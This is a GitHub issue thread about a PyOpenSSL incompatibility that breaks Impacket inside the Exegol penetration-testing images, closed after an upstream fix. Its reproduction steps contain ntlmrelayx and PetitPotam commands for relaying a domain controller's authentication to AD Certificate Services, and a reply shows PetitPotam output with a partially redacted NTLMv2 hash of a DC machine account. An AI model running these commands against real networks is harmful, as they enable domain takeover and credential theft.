search

ThePorgs / Exegol-images

Docker images of the Exegol project
https://exegol.readthedocs.io/
GNU General Public License v3.0
89 stars 69 forks source link

[BUG] Impacket 'OpenSSL.crypto' has no attribute 'PKCS12' #367

Closed chemoms closed 3 months ago

chemoms commented 4 months ago

Describe the bug

There is an issue with the PyOpenSSL library used by Impacket. Indeed, we encounter the following error when trying, for example, to retrieve an ADCS certificate : AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

To resolve the problem: pipx inject impacket PyOpenSSL==24.0.0 (I haven't tested with a higher version)

Steps To Reproduce

1) ntlmrelayx -debug -smb2support --target http://cert/certsrv/certfnsh.asp --adcs --template DomainController 2) petitpotam.py -u user -p passwd attacker_ip dc_ip

Exegol Wrapper Version

[D] Pip installation: On ✔                                                      
[D] Git source installation: Off 🪓                                             
[D] Host OS: Linux (Kernel)                                                     
[D] Arch: amd64                                                                 
[D] Raw arch: x86_64                                                            
[D] Docker desktop: Off 🪓                                                      
[D] Shell type: Linux                                                           
[D] Last wrapper update check: 18/06/2024                                       

[*] Exegol is currently in version v4.3.4

Exegol container information

│             Name │ temp                                                      │
│            Image │ full - v.3.1.4 (Up to date) (amd64)                       │
├──────────────────┼───────────────────────────────────────────────────────────┤
│      Credentials │ root : <secret>                     │
│   Remote Desktop │ Off 🪓                                                    │
│    Creation date │ 24/06/2024 08:50                                          │
│      Console GUI │ On ✔ (X11)                                                │
│          Network │ host                                                      │
│         Timezone │ On ✔                                                      │
│ Exegol resources │ On ✔ (/opt/resources)                                     │
│     My resources │ On ✔ (/opt/my-resources)                                  │
│    Shell logging │ On ✔ (/workspace/logs)                                    │
│       Privileged │ On 🔥                                                     │
│        Workspace │ Dedicated (/workspace)                                    │
│             Envs │ DISPLAY=:0.0                                              │
│                  │ _JAVA_AWT_WM_NONREPARENTING=1                             │
│                  │ QT_X11_NO_MITSHM=1                                        │
│                  │ EXEGOL_START_SHELL_LOGGING=asciinema                      │
│                  │ EXEGOL_START_SHELL_COMPRESS=True                          │
│                  │ EXEGOL_RANDOMIZE_SERVICE_PORTS=true                       │
│                  │ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/… │

Exception

No response

Additional context

No response

Anything else?

No response

QU35T-code commented 3 months ago

Hello @chemoms,

Can you give more details (code snippet / capture). On the nightly image it works correctly with petitpotam + responder. I'll try on the full image to see if the problem exists.

root@exegol-repro /workspace # petitpotam.py -u 'username' -p 'REDACTED' 10.10.10.6 192.168.10.100

              ___            _        _      _        ___            _
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_|
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)

                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:192.168.10.100[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 192.168.10.100
[SMB] NTLMv2-SSP Username : RED\DC01$
[SMB] NTLMv2-SSP Hash     : DC01$::RED:1122334455667788:EB2C50E3962CBCA25B799B2F8BA10935:0101000000000000803D02719ED6DA017AEC2FC495318D9B0000000002000800480057004C00580001001E00570049004E002D00440039004A005100460057004F0030003700380[...REDACTED...]

Is the error ntmlrelay or petitpotam ? In the case of ntlmrelay, I'll try to reproduce with an ADCS

ShutdownRepo commented 3 months ago

The issue has been fixed upstream https://github.com/fortra/impacket/issues/1716 ThePorgs' fork has been synced (https://github.com/ThePorgs/impacket/commit/18d25933e3b3b45fa4c35724ac9c7e11fcfa8207), it should fix the issue on the next nightly build, and following version releases Closing the issue as it will most certainly be fixed Please feel free to test on the next Exegol images, and re-open the issue if it persists Thank you for reporting the bug @chemoms ✌️

chemoms commented 2 months ago

Thanks for your work !!! ❤️❤️❤️❤️❤️